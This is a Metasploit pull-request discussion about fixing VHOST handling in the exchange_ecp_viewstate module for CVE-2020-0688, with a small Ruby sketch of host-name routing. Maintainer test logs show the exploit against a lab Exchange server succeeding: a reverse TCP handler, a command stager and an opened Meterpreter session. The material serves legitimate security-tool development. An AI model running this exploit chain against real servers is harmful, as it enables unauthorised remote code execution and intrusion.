
Use VHOST instead of RHOST #13042

Merged: 1 commit, Mar 9, 2020

Conversation

@t0-n1 t0-n1 commented Mar 7, 2020

The 'vhost_uri: true' setting enables the successful exploitation of this vulnerability in environments where you can't use an IP address (RHOST) to access the OWA web page.

#11485

@smcintyre-r7 smcintyre-r7 left a comment


Looks good, I'll get this tested and merged in assuming no issues are found. Thanks!

@smcintyre-r7

Before the patch

msf5 exploit(windows/http/exchange_ecp_viewstate) > set VHOST exchange.msflab.local
VHOST => exchange.msflab.local
msf5 exploit(windows/http/exchange_ecp_viewstate) > check

[-] Exploit aborted due to failure: unexpected-reply: Failed to get the __VIEWSTATEGENERATOR page
[-] 192.168.159.144:443 - Check failed: The state could not be determined.
msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Exploit aborted due to failure: unexpected-reply: Failed to get the __VIEWSTATEGENERATOR page
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/exchange_ecp_viewstate) >

After the patch

msf5 exploit(windows/http/exchange_ecp_viewstate) > set VHOST exchange.msflab.local
VHOST => exchange.msflab.local
msf5 exploit(windows/http/exchange_ecp_viewstate) > check
[+] 192.168.159.144:443 - The target is vulnerable.
msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Command Stager progress -   3.61% done (449/12424 bytes)
[*] Command Stager progress -   7.23% done (898/12424 bytes)
[*] Command Stager progress -  10.84% done (1347/12424 bytes)
[*] Command Stager progress -  14.46% done (1796/12424 bytes)
[*] Command Stager progress -  18.07% done (2245/12424 bytes)
[*] Command Stager progress -  21.68% done (2694/12424 bytes)
[*] Command Stager progress -  25.30% done (3143/12424 bytes)
[*] Command Stager progress -  28.91% done (3592/12424 bytes)
[*] Command Stager progress -  32.53% done (4041/12424 bytes)
[*] Command Stager progress -  36.14% done (4490/12424 bytes)
[*] Command Stager progress -  39.75% done (4939/12424 bytes)
[*] Command Stager progress -  43.37% done (5388/12424 bytes)
[*] Command Stager progress -  46.98% done (5837/12424 bytes)
[*] Command Stager progress -  50.60% done (6286/12424 bytes)
[*] Command Stager progress -  54.21% done (6735/12424 bytes)
[*] Command Stager progress -  57.82% done (7184/12424 bytes)
[*] Command Stager progress -  61.44% done (7633/12424 bytes)
[*] Command Stager progress -  65.05% done (8082/12424 bytes)
[*] Command Stager progress -  68.67% done (8531/12424 bytes)
[*] Command Stager progress -  72.28% done (8980/12424 bytes)
[*] Command Stager progress -  75.89% done (9429/12424 bytes)
[*] Command Stager progress -  79.51% done (9878/12424 bytes)
[*] Command Stager progress -  82.74% done (10279/12424 bytes)
[*] Command Stager progress -  86.15% done (10703/12424 bytes)
[*] Command Stager progress -  89.43% done (11111/12424 bytes)
[*] Command Stager progress -  92.91% done (11543/12424 bytes)
[*] Command Stager progress -  96.28% done (11962/12424 bytes)
[*] Sending stage (206403 bytes) to 192.168.159.144
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.144:43131) at 2020-03-09 10:36:19 -0400
[*] Command Stager progress -  99.84% done (12404/12424 bytes)
[*] Command Stager progress - 100.00% done (12424/12424 bytes)

meterpreter > 

I'll land this in just a moment.

@smcintyre-r7 smcintyre-r7 merged commit b148e9d into rapid7:master Mar 9, 2020

smcintyre-r7 commented Mar 9, 2020

Release Notes

This fixes a bug in the exchange_ecp_viewstate (CVE-2020-0688) module to properly use the VHOST value. This allows Metasploit to exploit targets where IIS has a Host Name specified in the Bindings section of the web application's configuration.


wvu commented Mar 9, 2020

Nice, I'm glad the option was useful to someone else.

@smcintyre-r7

@wvu-r7 I was thinking, is there a reason not to enable it as the default?


wvu commented Mar 9, 2020

I don't see why it can't be, since RHOST(S) is used for the connect, and this is just for the URI. I assume we didn't want to break existing behavior, but if someone wants to adequately check for regressions, they can feel free to change the behavior.
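The RHOST/VHOST split wvu describes (RHOST for the TCP connect, VHOST only in the URI) as an added Ruby sketch that is not the module's or Metasploit's own code: a stand-in full_uri plus a toy IIS host-name binding table. It assumes the server routes on the host name in the request URI and uses a constructed '/ecp/' path, so it shows why the check fails against a host-name-bound site when the IP ends up in the URI.

```ruby
require 'uri'

# Compose the request URL the way the thread describes: the TCP connect is
# always to rhost:rport, and the host name in the URI is vhost only when
# vhost_uri is set. Function name and arguments are this example's own.
def full_uri(rhost:, rport:, ssl:, vhost:, path:, vhost_uri: false)
  scheme = ssl ? 'https' : 'http'
  host = (vhost_uri && vhost) ? vhost : rhost
  default_port = ssl ? 443 : 80
  authority = rport == default_port ? host : "#{host}:#{rport}"
  "#{scheme}://#{authority}#{path}"
end

# Toy IIS: a site bound to a host name only answers requests addressed to
# that name; anything else falls through to the default site. The binding
# table is a constructed sample, not a real deployment.
IIS_BINDINGS = {
  'exchange.msflab.local' => :ecp_site,
  nil => :default_site
}.freeze

def route(url)
  IIS_BINDINGS.fetch(URI(url).host) { IIS_BINDINGS[nil] }
end

# The page the check needs exists only on the ECP site; a request routed
# to the default site gets a 404 and the state cannot be determined.
def check_ecp(url)
  route(url) == :ecp_site ? 200 : 404
end

# Run the check both ways against the sample target from the thread.
# '/ecp/' is a constructed sample path, not taken from the module.
def run_check(vhost_uri:)
  rhost = '192.168.159.144'
  url = full_uri(rhost: rhost, rport: 443, ssl: true,
                 vhost: 'exchange.msflab.local', path: '/ecp/',
                 vhost_uri: vhost_uri)
  { connect_to: [rhost, 443], url: url, status: check_ecp(url) }
end

if __FILE__ == $PROGRAM_NAME
  [false, true].each do |flag|
    r = run_check(vhost_uri: flag)
    puts "vhost_uri: #{flag} -> #{r[:url]} => HTTP #{r[:status]}"
  end
end
```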

@tperry-r7 tperry-r7 added the rn-enhancement (release notes enhancement) and rn-fix (release notes fix) labels and removed the rn-enhancement (release notes enhancement) label on Mar 16, 2020